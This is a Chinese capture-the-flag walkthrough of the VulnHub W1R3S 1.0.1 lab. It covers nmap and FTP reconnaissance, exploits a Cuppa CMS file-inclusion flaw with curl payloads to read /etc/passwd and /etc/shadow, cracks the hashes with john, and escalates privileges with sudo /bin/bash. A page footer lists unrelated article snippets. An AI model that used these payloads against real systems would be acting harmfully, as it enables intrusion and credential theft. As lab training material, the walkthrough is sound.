W1R3S: 1.0.1靶场
W1R3S: 1.0.1
来自 <W1R3S: 1.0.1 ~ VulnHub>
1,将两台虚拟机网络连接都改为NAT模式
2,攻击机上做namp局域网扫描发现靶机
nmap -sn 192.168.23.0/24
那么攻击机IP为192.168.23.182,靶场IP192.168.23.249
3,对靶机进行端口服务探测
nmap -sV -T4 -p- -A 192.168.23.249
各服务详细分析与攻击面
1 FTP 服务 (端口21)
- 匿名登录:允许匿名访问,存在敏感目录:
- content、docs、new-employees。
行动建议:
- 使用ftp 192.168.23.249匿名登录(用户:anonymous,密码为空)。
- 下载所有目录中的文件,检查是否有配置文件(如config.php)、数据库备份、员工信息等。
- 查找隐藏文件(如.htpasswd)或SSH私钥。
vsftpd 3.0.3:当前版本无已知严重漏洞(CVE-2011-2523后门漏洞仅影响2.3.4)。
2 HTTP 服务 (端口80)
默认页面:Apache默认页,需进一步枚举目录。
行动建议:
- 使用gobuster或dirsearch爆破目录(如/admin、/login、/backup)。
- 检查子域名或虚拟主机(Host: W1R3S.inc)。
- 查找敏感文件(robots.txt、phpinfo.php、.git泄露)。
漏洞可能性:
- 若存在Web应用(如CMS),可能存在SQL注入、文件上传等漏洞。
- Apache 2.4.18需检查配置错误(如目录遍历、启用危险模块)。
3 SSH 服务 (端口22)
OpenSSH 7.2p2:无已知高危漏洞(如CVE-2016-6210用户枚举需特定条件)。
攻击面:
- 暴力破解(若从其他服务获取用户名/密码)。
- 检查SSH密钥泄露(如从FTP或Web目录获取私钥)。
4 MySQL 服务 (端口3306)
未授权访问:需有效凭据连接。
行动建议:
- 从FTP/Web文件中查找数据库配置(用户/密码)。
- 尝试默认凭证(如root:root、admin:admin)。
- 利用Web应用的SQL注入获取数据库访问权。
4,匿名访问一下ftp服务器 anonymous
信息收集一下
dir
cd content
get 01.txt
get 02.txt
get 03.txt
cd docs
get worktodo.txt
cd new-employees
dir
get employee-names.txt
只是一些零散的信息收集
5,尝试访问80端口的http服务
尝试扫描其网站子目录
dirsearch -u http://192.168.23.249 -x 403,404,301
访问一下这个网页 http://192.168.23.249/wordpress/wp-login.php
对网站进行指纹目录扫描
whatweb -v http://192.168.23.249/wordpress/wp-login.php
6,再查看一下另一个子目录是啥情况,网站子目录如下
dirsearch -u http://192.168.23.249/administrator/ -x 403,404,301
http://192.168.23.249/administrator/installation/
算是一个CMS,看一下做什么的
安装失败,收集一下这个CMS会存在的版本漏洞
searchsploit cuppa
查看一下漏洞利用exp
searchsploit -m 25971.txt
Cuppa CMS核心特性与功能
Cuppa CMS 是一款开源的内容管理系统(CMS),旨在为用户提供简单易用的网站创建和管理功能。Cuppa CMS 的设计注重灵活性和易用性,主要特点包括:
- 开源免费:用户可自由下载、修改和分发代码,适合二次开发1。
- 模块化架构:支持按需启用功能模块,扩展性强1。
- 多语言与响应式设计:支持国际化适配,并确保网站在不同设备上的兼容性1。
- SEO优化:内置基础搜索引擎优化功能,提升内容收录效率1。
- 用户权限管理:提供角色分级,管理员可精细化控制访问权限1。
其功能涵盖内容管理、模板系统、数据备份与恢复等,适用于企业官网、个人博客及电商平台等多种场景
7,尝试漏洞利用
1. 漏洞原理与定位
Cuppa CMS的/alerts/alertConfigField.php文件中,第22行代码未对用户输入的urlConfig参数进行过滤,直接通过include($_REQUEST["urlConfig"])包含文件。攻击者可通过此参数注入任意本地或远程文件路径,导致以下风险:
- 本地文件包含(LFI):读取服务器敏感文件(如/etc/passwd、数据库配置文件等)。
- 远程文件包含(RFI):执行远程恶意脚本(需allow_url_include开启)。
- PHP代码执行:包含PHP文件时直接解析执行16。
2. 漏洞利用步骤
(1)本地文件读取
目标:获取服务器敏感信息(如配置文件、密码文件)。
示例请求:
# 读取Linux系统/etc/passwd
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
# 读取Windows系统文件(需调整路径格式)
http://target/cuppa/alerts/alertConfigField.php?urlConfig=..\..\..\..\..\Windows\win.ini
# 使用PHP伪协议读取源码(Base64编码避免执行)
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
操作说明:
- 解码Base64输出获取明文配置(如数据库用户名、密码)。
- 结合路径遍历(../)尝试读取其他敏感文件(如shadow、php.ini)36。
payload: http://192.168.23.249/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
没有任何回显,需要进行绕过处理
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.23.249/administrator/alerts/alertConfigField.php
漏洞漏洞利用成功,再读取一下记载着密码的敏感文件
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.23.249/administrator/alerts/alertConfigField.php
成功找到了密码的hash结果,再shadow文件中,有三个账号有密码,分别是root,www-data和w1r3s
7,讲hash值保存进一个文件,使用john进行解密
john hash
得到了两个账户密码,使用computer在ssh上面上线w1r3s用户
ssh w1r3s@192.168.23.249
信息收集一下
uname -a
lsb_release -a
查看一下具有什么sudo权限,发现具有所有权限
sudo -l
直接使用sudo权限开启一个shell
sudo /bin/bash
提权成功,并且得到flag
相关文章:
W1R3S: 1.0.1靶场
W1R3S: 1.0.1 来自 <W1R3S: 1.0.1 ~ VulnHub> 1,将两台虚拟机网络连接都改为NAT模式 2,攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182,靶场IP192.168.23.249 3,对靶机进行端口…...
深度学习-分布式训练机制
1、分布式训练时,包括train.py的全部的代码都会在每个gpu上运行吗? 在分布式训练(如使用 PyTorch 的 DistributedDataParallel,DDP)时,每个 GPU 上运行的进程会执行 train.py 的全部代码,但通过…...
[Mamba轻量化]DefMamba: Deformable Visual State Space Model,CVPR2025
paper 文章目录 AbstractMethod整体模型架构可变形状态空间模型 Experiments Abstract 然而,大多数现有的视觉Mamba方法使用预定义的扫描顺序将图像展平为1D序列,导致模型在特征提取过程中对图像空间结构信息的利用能力减弱。为解决这一问题࿰…...
CSRF 和 XSS 攻击分析与防范
CSRF 和 XSS 攻击分析与防范 CSRF (跨站请求伪造) 什么是 CSRF? CSRF (Cross-Site Request Forgery) 是一种攻击方式,攻击者诱使用户在已登录目标网站的情况下,执行非预期的操作。 攻击流程: 用户登录可信网站 A在不登出 A 的…...
找银子 题解(c++)
题目 思路 首先,这道题乍一看,应该可以用搜索来做。 但是,搜索会不会超时间限制呢? 为了防止时间超限,我们可以换一种做法。 先创立两个二维数组,一个是输入的数组a,一个是数组b。 假设 i 行 j 列的数…...
中国版 Cursor?腾讯推出 AI 编程助手 CodeBuddy,重新定义编程体验
人工智能(AI)技术的迅猛发展正深刻地变革着各个行业,编程领域也不例外。以原生 IDE 体验见长的 Cursor,凭借其 Agent 模式在 AI 编程领域脱颖而出,对 GitHub Copilot 以及 VS Code 与 JetBrains 全家桶的地位发起挑战。…...
JVM学习专题(二)内存模型深度剖析
目录 1.JVM结构体系 编辑 2.跨平台特性 3.JVM整体结构及内存模型 1.栈内存 1、栈帧: 1.局部变量表 2.操作数栈 3.动态链接 4.方法出口 2、创建对象 2.程序计数器: 3.方法区 4.堆 5.本地方法区 6.总结 1.JVM结构体系 JDK、JRE 和 JVM…...
密码学实验:凯撒密码
密码学实验:凯撒密码 一、实验目的 掌握凯撒密码的数学原理:理解字符移位与模运算的结合,实现加解密算法。理解暴力破解本质:通过穷举有限密钥空间,掌握利用语言特征破解密文的方法。编程实践:用Python实…...
linux备份与同步工具rsync
版权声明:原创作品,请勿转载! 文章目录 版权声明:原创作品,请勿转载! 实验环境介绍: 1.工具介绍 2.详细介绍 2.1 本地模式(用得少) 2.2 远程模式 2.3 守护进程模式…...
PYTHON训练营DAY26
一、函数 (一)不带参数的函数 # 定义一个简单的问候函数 def greet():"""打印一句问候语。"""message "大家好!欢迎学习Python函数定义!"print(message)greet()(二&#x…...
WPS一旦打开,就会修改默认打开方式,怎么解?
目录 前言 解决方法 结语 前言 电脑上同时存在WPS和微软的Office全家桶,但是我更喜欢用Office全家桶。前几天刚在设置改过来,忘记更改pdf文件打开默认应用。结果没过几天,不小心用WPS打开pdf文件时候,给我把默认设置全改回去了…...
从概念到可工程化智能体的转变路径——以“知识奇点工程师”为例
产品部门定义了一个如下概念性的“知识奇点工程师”,他们构建的不仅仅是一个数据库或知识图谱,而是一个活的、能自我进化的知识生态系统,是整个“Neuralink for Education”宏伟蓝图的基石。他们的工作难度和重要性,不亚于为AI引擎…...
单片机-STM32部分:12、I2C
飞书文档https://x509p6c8to.feishu.cn/wiki/MsB7wLebki07eUkAZ1ec12W3nsh 一、简介 IIC协议,又称I2C协议,是由PHILP公司在80年代开发的两线式串行总线,用于连接微控制器及其外围设备,IIC属于半双工同步通信方式。 IIC是一种同步…...
Payload的定义及核心概念
在IT领域,Payload(有效载荷) 指数据传输或操作中承载实际功能或信息的主体部分,与协议头、元数据等辅助内容区分。其核心特点是完成特定目标,例如传递关键数据、执行代码逻辑或实现攻击行为。 主要应用场景及技术解析 …...
idea插件使用
文章目录 在哪里安装插件常用插件 在哪里安装插件 离线下载插件请参考我的文章–>可复用性代码 在线下载 插件 :File(文件) —> Settings(设置) —> Plugins(插件) 常用插件 汉化插件:Chinese (Simplified) Language Pack /中文语言包。作者:…...
计算机网络笔记(二十四)——4.6互联网的路由选择协议
4.6.1有关路由选择协议的几个基本概念 路由选择协议是计算机网络中维护和生成路由表的核心机制。 1. 路由选择的核心目标 转发(Forwarding):路由器基于本地转发表,将分组从输入链路转移到输出链路(单台路由器的本地…...
UniApp 微信小程序绑定动态样式 :style 避坑指南
在使用 UniApp 开发跨端应用时,绑定动态样式 :style 是非常常见的操作。然而,很多开发者在编译为 微信小程序 时会遇到一个奇怪的问题: 原本在 H5 中可以正常渲染的样式,在微信小程序中却不生效! 让我们通过一个示例来…...
论文阅读与写作:《从探索到突破:解密科研和论文写作的思维密码》
文章目录 一、如何做科研1.科研的步骤2.课题选择3.快速入门一个新领域:读论文,先读综述(1)自己看论文的时候,每篇论文花3-5分钟记录一下自己的idea和一些瞬间的想法(2)高质量文献:顶会顶刊(3)如何检索 4.注重团队协作与学术交流5.…...
致远OA绩效考核管理应用【附百度网盘下载链接,官方售价8K】
产品概述 绩效考核管理预置三种考核方式:工作事务考核、关键绩效考核、360度考评,满足不同企业考核需求,从考核等级定义、考核方案设置、考核分发到员工考核,再到考核结果汇总并审批,对绩效考核全过程进行闭环管理&…...
Vue百日学习计划Day4-8——Gemini版
番茄时钟: 每个番茄钟为25分钟学习,之后休息5分钟。每完成4个番茄钟,进行一次15-30分钟的长休息。灵活性: 这仍然是一个建议性计划。某些主题(尤其是 Flexbox 和 Grid)可能需要比预期更多的时间来练习和理解…...
HarmonyOS NEXT 适配高德地图FlutterSDK实现地图展示,添加覆盖物和移动Camera
HarmonyOS NEXT 适配高德地图 Flutter SDK 实现地图展示,添加覆盖物和移动 Camera 在现代移动应用开发中,地图功能是许多应用的核心组成部分之一。HarmonyOS NEXT 提供了强大的跨平台开发能力,而高德地图 Flutter SDK 则为开发者提供了丰富的…...
DeepSeek执行流程加速指南:跨框架转换与编译优化的核心策略全解析
💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…...
docker-compose——安装redis
文章目录 一、编写docker-compose.yaml文件二、编写redis.conf文件三、启动docker-compose 一、编写docker-compose.yaml文件 version: 3.3 services:redis:image: redis:latestcontainer_name: redisrestart: alwaysports:- 6379:6379volumes:- ./redis/data:/data- ./redis/…...
manuskript开源程序是面向作家的开源工具
一、软件介绍 文末提供程序和源码下载 manuskript开源程序是面向作家的开源工具,Manuskript 可在 GNU/Linux、Mac OS X 和 Windows 上运行。 二、Features 特征 Manuskript provides a rich environment to help writers create their first draft and then furt…...
游戏引擎学习第281天:在房间之间为摄像机添加动画效果
回顾并为今天的内容定下基调 这次我们要继续深入处理实体系统。在前一阶段对实体系统做了一些很酷的改动,但现在到了要认真面对和完善它的时候。 今天的主要目标是修复并优化摄像机在房间之间移动时的逻辑。在上一次的实现中,我们重新启用了基于房间的…...
Kaamel隐私合规洞察:Temu在韩被罚事件分析
Kaamel隐私合规与数据安全团队分析报告 韩国个人信息保护委员会(PIPC)对中国电子商务巨头Temu处以巨额罚款,原因是其严重违反了用户数据保护法律 。核心违规行为包括未经适当披露或用户同意非法跨境传输数据、未能指定当地代表、账户注销流程…...
计算机视觉----基于锚点的车道线检测、从Line-CNN到CLRNet到CLRKDNet 本文所提算法Line-CNN 后续会更新以下全部算法
本文所提算法如下: 叙述按时间顺序 你也可以把本文当作快速阅读这几篇文献的一个途径 所有重要的部分我都已经标注并弄懂其原理 方便自己也是方便大家 Line-CNN:基于线提议单元的端到端交通线检测 摘要 交通线检测是一项基础且具有挑战性的任务。以往的…...
25.5.15
没有比水题更令人开心的事情了 典型的并查集题目,并查集分为并和查,并就是把有关系的父亲根结点设为同一个,查就是在成功构造后对其进行查询 查通过递归实现 if (x f[x])return x; return f[x] find(f[x]); 由于并查集的特点࿰…...
5.重建大师数据管理模块介绍
摘要:本文主要介绍重建大师数据管理模块,包含:照片、点云数据可视化管理工具。 数据管理界面主要包含工具栏、可视化界面和照片组列表三部分。 图 数据管理界面 1.工具栏 工具栏包含以下功能按钮,包含添加照片、视频、点云、控制…...
MATLAB安装常见问题及解决方案详解(含代码示例)
MATLAB作为科学计算和工程分析的核心工具,其安装过程可能因操作系统版本、硬件配置或网络环境等因素而出现各种问题。本文基于MATLAB官方文档和社区经验,系统总结了安装过程中常见的问题,并提供详细的解决方案和代码示例,帮助用户…...